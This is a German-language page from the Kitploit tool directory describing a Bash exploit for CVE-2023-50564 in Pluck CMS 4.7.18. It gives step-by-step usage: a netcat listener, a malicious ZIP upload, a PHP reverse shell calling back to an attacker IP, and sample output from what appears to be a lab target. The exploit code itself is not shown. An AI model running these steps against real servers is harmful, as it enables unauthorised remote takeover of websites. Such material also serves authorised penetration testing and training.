Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564 — Bash-Exploit, das authentifizierte Remote-Codeausführung in Pluck CMS 4.7.18 über einen bösartigen ZIP-Upload automatisiert und eine PHP-Reverse-Shell für CVE-2023-50564 auslöst. | Kitploit
Tools/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

Bash-Exploit, das authentifizierte Remote-Codeausführung in Pluck CMS 4.7.18 über einen bösartigen ZIP-Upload automatisiert und eine PHP-Reverse-Shell für CVE-2023-50564 auslöst.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
13vor 1 JahrNoch nicht geprüft
Teilen

CVE-2023-50564 - Pluck CMS v4.7.18 Remote Code Execution (RCE) Exploit

Beschreibung

Dieses Skript nutzt eine Remote Code Execution (RCE)-Sicherheitslücke in Pluck CMS v4.7.18 aus. Die Schwachstelle erlaubt es einem Angreifer, eine schadhafte PHP-Datei auf den Server hochzuladen und auszuführen, wodurch er entfernte Befehlsausführung auf dem Zielsystem erlangt.

Das Skript automatisiert den gesamten Prozess durch:

  1. Authentifizierung am Admin-Panel von Pluck CMS mit den angegebenen Anmeldedaten.
  2. Hochladen einer ZIP-Datei, die ein schädliches PHP-Reverse-Shell-Skript enthält.
  3. Ausführen der PHP-Reverse-Shell, die dem Angreifer entfernten Zugriff auf das Zielsystem gewährt.

Hinweis: Das Skript benötigt einen Netcat-Listener auf dem Rechner des Angreifers, um die Reverse-Shell zu empfangen.


Voraussetzungen

Bevor Sie das Skript ausführen, stellen Sie sicher, dass Folgendes vorhanden ist:

  • Netcat ist installiert und ein Listener eingerichtet, um die Reverse-Shell zu empfangen.
  • Sie haben die korrekte Ziel-Host-Adresse, das Passwort, die IP-Adresse und den Port für die Reverse-Shell.
  • Sie haben Zugriff auf das Admin-Panel von Pluck CMS auf dem Zielsystem.

  • Nutzung

    root@kitploit:~
    ./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>
    

    Argumente:

    • -h <host>: Der Zielhost (z. B. greenhorn.htb).
    • -P <password>: Das Passwort für das Admin-Panel von Pluck CMS (z. B. abcd123).
    • -i <IP>: Die IP-Adresse des Angreifers, an die die Reverse-Shell gesendet wird.
    • -p <port>: Der Port, auf dem der Netcat-Listener läuft, um die Reverse-Shell zu empfangen.

    Beispiel:

    root@kitploit:~
    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    

    Schritte:

    1. Netcat-Listener einrichten: Starten Sie auf dem Rechner des Angreifers einen Netcat-Listener auf dem angegebenen Port:

      root@kitploit:~
      nc -nvlp <port>
      

      Zum Beispiel:

      root@kitploit:~
      nc -nvlp 9001
      
    2. Skript ausführen: Geben Sie dem Skript die erforderlichen Parameter wie Host, Passwort, IP-Adresse und Port an.

      root@kitploit:~
      ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
      
    3. Skriptausführung:

      • Das Skript meldet sich am Admin-Panel von Pluck CMS an.
      • Es lädt eine ZIP-Datei hoch, die ein Reverse-Shell-PHP-Skript (love.php) enthält.
      • Sobald die ZIP-Datei hochgeladen ist, wird die Reverse-Shell auf dem Ziel ausgeführt und eine Verbindung zu Ihrem Netcat-Listener hergestellt.
      • Es wird eine saubere Meldung angezeigt: "RCE is waiting for you, please go take a look.", und das Skript beendet sich, nachdem es die benötigte Zeit erfasst hat.
    4. Auf das Ziel zugreifen: Sobald die Reverse-Shell ausgelöst wird, erscheint die Verbindung in Ihrem Netcat-Listener, der Ihnen entfernten Zugriff auf das Zielsystem gewährt.


    PoC

    image

    Beispielausgabe

    root@kitploit:~
    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    Netcat listener detected on port 9001.
    Downloading reverse shell PHP exploit...
    updating: love.php (deflated 60%)
    Exploit zipped as loverce.zip and original PHP file removed.
    Extracted Cookie: PHPSESSID=somecookievalue
    Login successful!
    ZIP file uploaded successfully.
    RCE is waiting for you, please go take a look.
    Script terminated. Total time taken: 70 seconds.
    

    Anforderungen

    • cURL: Zur Interaktion mit Pluck CMS und zum Hochladen von Dateien.
    • Netcat: Zum Lauschen auf die Reverse-Shell.

    Sie können curl und netcat mit den folgenden Befehlen installieren, falls sie nicht vorhanden sind:

    Debian/Ubuntu:

    root@kitploit:~
    sudo apt update
    sudo apt install curl netcat
    

    Red Hat/CentOS/Fedora:

    root@kitploit:~
    sudo yum install curl nc
    

    Haftungsausschluss

    Dieses Skript ist ausschließlich für Bildungs- und autorisierte Penetrationstest-Zwecke bestimmt. Die unbefugte Nutzung dieses Skripts ist illegal und unethisch. Holen Sie stets eine ordnungsgemäße Genehmigung ein, bevor Sie eine Sicherheitslücke auf einem System ausnutzen.


    Fehlerbehebung

    1. 504 Gateway Time-out: Das Skript könnte diesen Fehler beim Versuch, die Reverse-Shell auszuführen, erhalten. Dies beeinträchtigt jedoch nicht den Erfolg der Shell-Ausführung. Der Fehler tritt normalerweise auf, weil der Zielserver zu lange braucht, um auf die HTTP-Anfrage zu antworten, die Shell sollte dennoch funktionieren.

    2. Netcat-Listener-Probleme: Falls Sie keine Reverse-Shell erhalten, stellen Sie sicher, dass Ihre IP-Adresse und Ihr Port korrekt eingestellt sind und dass keine Firewall-Einschränkungen verhindern, dass das Ziel eine Verbindung zu Ihrem Rechner herstellt.

    3. Skript kann sich nicht anmelden: Falls die Anmeldung am CMS-Admin-Panel fehlschlägt, überprüfen Sie das angegebene Passwort und stellen Sie sicher, dass das CMS auf dem Zielsystem erreichbar ist.

    Tool herunterladen